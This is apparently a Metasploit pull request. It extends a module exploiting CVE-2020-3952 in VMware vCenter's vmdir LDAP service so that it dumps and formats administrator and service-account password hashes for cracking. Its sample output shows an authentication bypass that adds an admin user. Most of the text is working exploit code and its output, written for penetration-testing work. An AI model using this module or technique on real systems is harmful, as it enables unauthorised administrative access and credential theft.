### PR TITLE
Added Dump hashes to auxiliary/gather/vmware_vcenter_vmdir_ldap

### DIFF
--- a/documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md
+++ b/documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md
@@ -4,7 +4,8 @@
 
 This module bypasses LDAP authentication in VMware vCenter Server's
 vmdir service to add an arbitrary administrator user. Version 6.7
-prior to the 6.7U3f update is vulnerable.
+prior to the 6.7U3f update is vulnerable, only if upgraded from a
+previous release line, such as 6.0 or 6.5.
 
 ### Setup
 

--- a/documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md
+++ b/documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md
@@ -109,8 +109,8 @@ vmwpasswordminspecialcharcount: [redacted]
 vmwpasswordminuppercasecount: [redacted]
 vmwpasswordprohibitedpreviouscount: [redacted]
 
-[+] Credentials found: CN=HynekAdmin,CN=Users,DC=vsphere,DC=local:$dynamic_82$43717fbfb6d81163b5f8f7a479311ad0904134bc086a02e090b3bb5322cc0166c91163920575d4b6a2790e5189a83b71757d69a003c9856212ca6a8e3dc6e407$HEX$1d174c634c8bf44558e132c3f0d8b401
-[+] Credentials found: CN=HynekAdmin,CN=Users,DC=vsphere,DC=local:$dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08d06568e478e1a7695484a934b19a28b94f58595d4de68b27771362bc2b52444a0ed03e980e11ad5e5ffa6daa9e7e1$HEX$171ada255464a439569352c60258e7c6
+[+] Credentials found: [redacted]
+[snip]
 [*] Bypassing LDAP auth in vmdir service at [redacted]:389
 [*] Adding admin user msfadmin with password msfadmin
 [+] Added user msfadmin, so auth bypass was successful!

--- a/documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md
+++ b/documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md
@@ -95,14 +95,6 @@ supportedsaslmechanisms: GSSAPI
 [*] Storing LDAP data in loot
 [+] Saved LDAP data to /Users/wvu/.msf4/loot/20200417002255_default_[redacted]_VMwarevCenterS_975097.txt
 [*] Password and lockout policy:
-dn: cn=password and lockout policy,dc=vsphere,dc=local
-cn: password and lockout policy
-enabled: TRUE
-ntsecuritydescriptor:: [redacted]
-objectclass: top
-objectclass: vmwLockoutPolicy
-objectclass: vmwPasswordPolicy
-objectclass: vmwPolicy
 vmwpasswordchangeautounlockintervalsec: [redacted]
 vmwpasswordchangefailedattemptintervalsec: [redacted]
 vmwpasswordchangemaxfailedattempts: [redacted]
@@ -117,6 +109,8 @@ vmwpasswordminspecialcharcount: [redacted]
 vmwpasswordminuppercasecount: [redacted]
 vmwpasswordprohibitedpreviouscount: [redacted]
 
+[+] Credentials found: CN=HynekAdmin,CN=Users,DC=vsphere,DC=local:$dynamic_82$43717fbfb6d81163b5f8f7a479311ad0904134bc086a02e090b3bb5322cc0166c91163920575d4b6a2790e5189a83b71757d69a003c9856212ca6a8e3dc6e407$HEX$1d174c634c8bf44558e132c3f0d8b401
+[+] Credentials found: CN=HynekAdmin,CN=Users,DC=vsphere,DC=local:$dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08d06568e478e1a7695484a934b19a28b94f58595d4de68b27771362bc2b52444a0ed03e980e11ad5e5ffa6daa9e7e1$HEX$171ada255464a439569352c60258e7c6
 [*] Bypassing LDAP auth in vmdir service at [redacted]:389
 [*] Adding admin user msfadmin with password msfadmin
 [+] Added user msfadmin, so auth bypass was successful!

--- a/documentation/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.md
+++ b/documentation/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.md
@@ -80,14 +80,6 @@ supportedsaslmechanisms: GSSAPI
 [*] Storing LDAP data in loot
 [+] Saved LDAP data to /Users/wvu/.msf4/loot/20200417002613_default_[redacted]_VMwarevCenterS_939568.txt
 [*] Password and lockout policy:
-dn: cn=password and lockout policy,dc=vsphere,dc=local
-cn: password and lockout policy
-enabled: TRUE
-ntsecuritydescriptor:: [redacted]
-objectclass: top
-objectclass: vmwLockoutPolicy
-objectclass: vmwPasswordPolicy
-objectclass: vmwPolicy
 vmwpasswordchangeautounlockintervalsec: [redacted]
 vmwpasswordchangefailedattemptintervalsec: [redacted]
 vmwpasswordchangemaxfailedattempts: [redacted]

--- a/documentation/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.md
+++ b/documentation/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.md
@@ -102,6 +102,8 @@ vmwpasswordminspecialcharcount: [redacted]
 vmwpasswordminuppercasecount: [redacted]
 vmwpasswordprohibitedpreviouscount: [redacted]
 
+[+] Credentials found: CN=HynekAdmin,CN=Users,DC=vsphere,DC=local:$dynamic_82$43717fbfb6d81163b5f8f7a479311ad0904134bc086a02e090b3bb5322cc0166c91163920575d4b6a2790e5189a83b71757d69a003c9856212ca6a8e3dc6e407$HEX$1d174c634c8bf44558e132c3f0d8b401
+[+] Credentials found: CN=HynekAdmin,CN=Users,DC=vsphere,DC=local:$dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08d06568e478e1a7695484a934b19a28b94f58595d4de68b27771362bc2b52444a0ed03e980e11ad5e5ffa6daa9e7e1$HEX$171ada255464a439569352c60258e7c6
 [*] Auxiliary module execution completed
 msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) >
 ```

--- a/documentation/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.md
+++ b/documentation/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.md
@@ -94,8 +94,8 @@ vmwpasswordminspecialcharcount: [redacted]
 vmwpasswordminuppercasecount: [redacted]
 vmwpasswordprohibitedpreviouscount: [redacted]
 
-[+] Credentials found: CN=HynekAdmin,CN=Users,DC=vsphere,DC=local:$dynamic_82$43717fbfb6d81163b5f8f7a479311ad0904134bc086a02e090b3bb5322cc0166c91163920575d4b6a2790e5189a83b71757d69a003c9856212ca6a8e3dc6e407$HEX$1d174c634c8bf44558e132c3f0d8b401
-[+] Credentials found: CN=HynekAdmin,CN=Users,DC=vsphere,DC=local:$dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08d06568e478e1a7695484a934b19a28b94f58595d4de68b27771362bc2b52444a0ed03e980e11ad5e5ffa6daa9e7e1$HEX$171ada255464a439569352c60258e7c6
+[+] Credentials found: [redacted]
+[snip]
 [*] Auxiliary module execution completed
 msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) >
 ```

--- a/documentation/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.md
+++ b/documentation/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.md
@@ -4,7 +4,8 @@
 
 This module uses an anonymous-bind LDAP connection to dump data from
 the vmdir service in VMware vCenter Server version 6.7 prior to the
-6.7U3f update.
+6.7U3f update, only if upgraded from a previous release line, such as
+6.0 or 6.5.
 
 ### Setup
 

--- a/lib/metasploit/framework/hashes/identify.rb
+++ b/lib/metasploit/framework/hashes/identify.rb
@@ -41,7 +41,7 @@ def identify_hash(hash)
     when hash =~ /^[\.\/\dA-Za-z]{13}$/ # hash.length == 13
       return 'des,crypt'
     when hash =~ /^\$dynamic_82\$[\da-f]{128}\$HEX\$[\da-f]{32}$/ # jtr vmware ldap https://github.com/rapid7/metasploit-framework/pull/13865#issuecomment-660718108
-      return 'dyanmic_82'
+      return 'dynamic_82'
     # windows
     when hash.length == 65 && hash =~ /^[\da-fA-F]{32}:[\da-fA-F]{32}$/ && hash.split(':').first.upcase == 'AAD3B435B51404EEAAD3B435B51404EE'
       return 'nt'

--- a/lib/metasploit/framework/hashes/identify.rb
+++ b/lib/metasploit/framework/hashes/identify.rb
@@ -40,6 +40,8 @@ def identify_hash(hash)
       return 'des,bsdi,crypt'
     when hash =~ /^[\.\/\dA-Za-z]{13}$/ # hash.length == 13
       return 'des,crypt'
+    when hash =~ /^\$dynamic_82\$[\da-f]{128}\$HEX\$[\da-f]{32}$/ # jtr vmware ldap https://github.com/rapid7/metasploit-framework/pull/13865#issuecomment-660718108
+      return 'dyanmic_82'
     # windows
     when hash.length == 65 && hash =~ /^[\da-fA-F]{32}:[\da-fA-F]{32}$/ && hash.split(':').first.upcase == 'AAD3B435B51404EEAAD3B435B51404EE'
       return 'nt'

--- a/lib/metasploit/framework/password_crackers/cracker.rb
+++ b/lib/metasploit/framework/password_crackers/cracker.rb
@@ -184,6 +184,8 @@ module Metasploit
             '10'
           when 'hmac-md5'
             '10200'
+          when 'dynamic_82'
+            '1710'
           else
             nil
           end

--- a/lib/metasploit/framework/password_crackers/hashcat/formatter.rb
+++ b/lib/metasploit/framework/password_crackers/hashcat/formatter.rb
@@ -59,6 +59,8 @@ def hash_to_hashcat(cred)
       if cred.private.jtr_format.start_with?('des') # 'des,oracle', not oracle11/12c, hash-mode: 3100
         return "#{cred.private.data}"
       end
+    when /dynamic_82/
+      return cred.private.data.sub('$HEX$', ':').sub('$dynamic_82$','')
     when /mysql-sha1/
       # lowercase, and remove the first character if its a *
       return cred.private.data.downcase.sub('*','')

--- a/lib/metasploit/framework/password_crackers/jtr/formatter.rb
+++ b/lib/metasploit/framework/password_crackers/jtr/formatter.rb
@@ -62,6 +62,7 @@ def hash_to_jtr(cred)
       # /mssql|mssql05|mssql12/
       # /des(crypt)/
       # /mediawiki|phpass|atlassian/
+      # /dynamic_82/
       return "#{cred.public.username}:#{cred.private.data}:#{cred.id}:"
     end
   end

--- a/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb
+++ b/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb
@@ -16,10 +16,11 @@ class MetasploitModule < Msf::Auxiliary
         'Description' => %q{
           This module bypasses LDAP authentication in VMware vCenter Server's
           vmdir service to add an arbitrary administrator user. Version 6.7
-          prior to the 6.7U3f update is vulnerable.
+          prior to the 6.7U3f update is vulnerable, only if upgraded from a
+          previous release line, such as 6.0 or 6.5.
         },
         'Author' => [
-          # Discovered by unknown researcher(s)
+          'Hynek Petrak', # Discovery
           'JJ Lehmann', # Analysis and PoC
           'Ofri Ziv', # Analysis and PoC
           'wvu' # Module

--- a/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb
+++ b/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb
@@ -87,6 +87,7 @@ class MetasploitModule < Msf::Auxiliary
       print_status("Dumping LDAP data from vmdir service at #{peer}")
 
       # A "-" meta-attribute will dump userPassword (hat tip Hynek)
+      # https://github.com/vmware/lightwave/blob/637a1935fdd3cae4df6aa8925c69fd5744ab1a88/vmdir/server/ldap-head/result.c#L647-L654
       entries = ldap.search(base: base_dn, attributes: %w[* + -])
     end
 

--- a/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb
+++ b/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb
@@ -148,7 +148,7 @@ class MetasploitModule < Msf::Auxiliary
       dn = entry.dn
 
       # https://github.com/vmware/lightwave/blob/637a1935fdd3cae4df6aa8925c69fd5744ab1a88/lwraft/server/middle-layer/password.c#L36-L45
-      type, hash, salt = entry[:userpassword].unpack('CH128H32')
+      type, hash, salt = entry[:userpassword].first.unpack('CH128H32')
 
       unless type == 1
         vprint_error("Hash type #{type} not supported yet (#{dn})")

--- a/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb
+++ b/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb
@@ -133,7 +133,7 @@ class MetasploitModule < Msf::Auxiliary
 
     if (policy = entries.find { |entry| entry.dn == policy_dn })
       print_status('Password and lockout policy:')
-      print_line(policy.to_ldif)
+      print_line(policy.to_ldif[/^vmwpassword.*/m])
     end
 
     # Process entries with a non-empty userPassword attribute

--- a/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb
+++ b/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb
@@ -176,7 +176,7 @@ class MetasploitModule < Msf::Auxiliary
         end
 
         # https://github.com/magnumripper/JohnTheRipper/blob/2778d2e9df4aa852d0bc4bfbb7b7f3dde2935b0c/doc/DYNAMIC#L197
-        john_hash = "$#{jtr_format}$#{hash}$HEX$#{salt}"
+        john_hash = "$dynamic_82$#{hash}$HEX$#{salt}"
       else
         vprint_error("Hash type #{type.inspect} is not supported yet (#{dn})")
         next

--- a/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb
+++ b/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb
@@ -3,6 +3,8 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'metasploit/framework/hashes/identify'
+
 class MetasploitModule < Msf::Auxiliary
 
   include Msf::Exploit::Remote::LDAP
@@ -174,7 +176,6 @@ class MetasploitModule < Msf::Auxiliary
         end
 
         # https://github.com/magnumripper/JohnTheRipper/blob/2778d2e9df4aa852d0bc4bfbb7b7f3dde2935b0c/doc/DYNAMIC#L197
-        jtr_format = 'dynamic_82'
         john_hash = "$#{jtr_format}$#{hash}$HEX$#{salt}"
       else
         vprint_error("Hash type #{type.inspect} is not supported yet (#{dn})")
@@ -187,7 +188,7 @@ class MetasploitModule < Msf::Auxiliary
         username: dn,
         private_data: john_hash,
         private_type: :nonreplayable_hash,
-        jtr_format: jtr_format
+        jtr_format: identify_hash(john_hash)
       ))
     end
   end

--- a/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb
+++ b/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb
@@ -151,7 +151,17 @@ class MetasploitModule < Msf::Auxiliary
       type, hash, salt = entry[:userpassword].first.unpack('CH128H32')
 
       unless type == 1
-        vprint_error("Hash type #{type} not supported yet (#{dn})")
+        vprint_error("Hash type #{type} is not supported yet (#{dn})")
+        next
+      end
+
+      unless hash.length == 128
+        vprint_error("Hash length is #{hash.length} digits, not 128 (#{dn})")
+        next
+      end
+
+      unless salt.length == 32
+        vprint_error("Salt length is #{salt.length} digits, not 32 (#{dn})")
         next
       end
 


### PR DESCRIPTION
As discuss in #13865, here is a pull request that adds hash dump to a auxiliary/gather/vmware_vcenter_vmdir_ldap module.

TODO: save credentials with msf api, documentation

## Example

```
msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > run
[*] Running module against [host_ip]

[*] Discovering base DN automatically
[*] Searching root DSE for base DN
[+] Discovered base DN: dc=vsphere,dc=local
[*] Dumping LDAP data from vmdir service at [host_ip]:389
[+] [host_ip]:389 is vulnerable to CVE-2020-3952
[+] [host_ip] cn=[FQDN],ou=Domain Controllers,dc=vsphere,dc=local:$dynamic_82$[hash_64B_in_hex]$HEX$[salt_16B_in_hex]
[+] [host_ip] cn=Administrator,cn=Users,dc=vsphere,dc=local:$dynamic_82$[hash_64B_in_hex]$HEX$[salt_16B_in_hex]
[+] [host_ip] cn=vmca/[FQDN]@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$[hash_64B_in_hex]$HEX$[salt_16B_in_hex]
[+] [host_ip] cn=ldap/[FQDN]@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$[hash_64B_in_hex]$HEX$[salt_16B_in_hex]
[+] [host_ip] cn=host/[FQDN]@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$[hash_64B_in_hex]$HEX$[salt_16B_in_hex]
[*] Storing LDAP data in loot
[+] Saved LDAP data to /root/.msf4/loot/20200720042341_default_[host_ip]_VMwarevCenterS_212196.txt
[*] Password and lockout policy:
dn: cn=password and lockout policy,dc=vsphere,dc=local
cn: password and lockout policy
description:
enabled: TRUE
ntsecuritydescriptor:: [redacted]
objectclass: top
objectclass: vmwLockoutPolicy
objectclass: vmwPasswordPolicy
objectclass: vmwPolicy
vmwpasswordchangeautounlockintervalsec: 300
vmwpasswordchangefailedattemptintervalsec: 180
vmwpasswordchangemaxfailedattempts: 5
vmwpasswordlifetimedays: 99999
vmwpasswordmaxidenticaladjacentchars: 3
vmwpasswordmaxlength: 20
vmwpasswordminalphabeticcount: 2
vmwpasswordminlength: 8
vmwpasswordminlowercasecount: 1
vmwpasswordminnumericcount: 1
vmwpasswordminspecialcharcount: 1
vmwpasswordminuppercasecount: 1
vmwpasswordprohibitedpreviouscount: 5

[*] Auxiliary module execution completed
```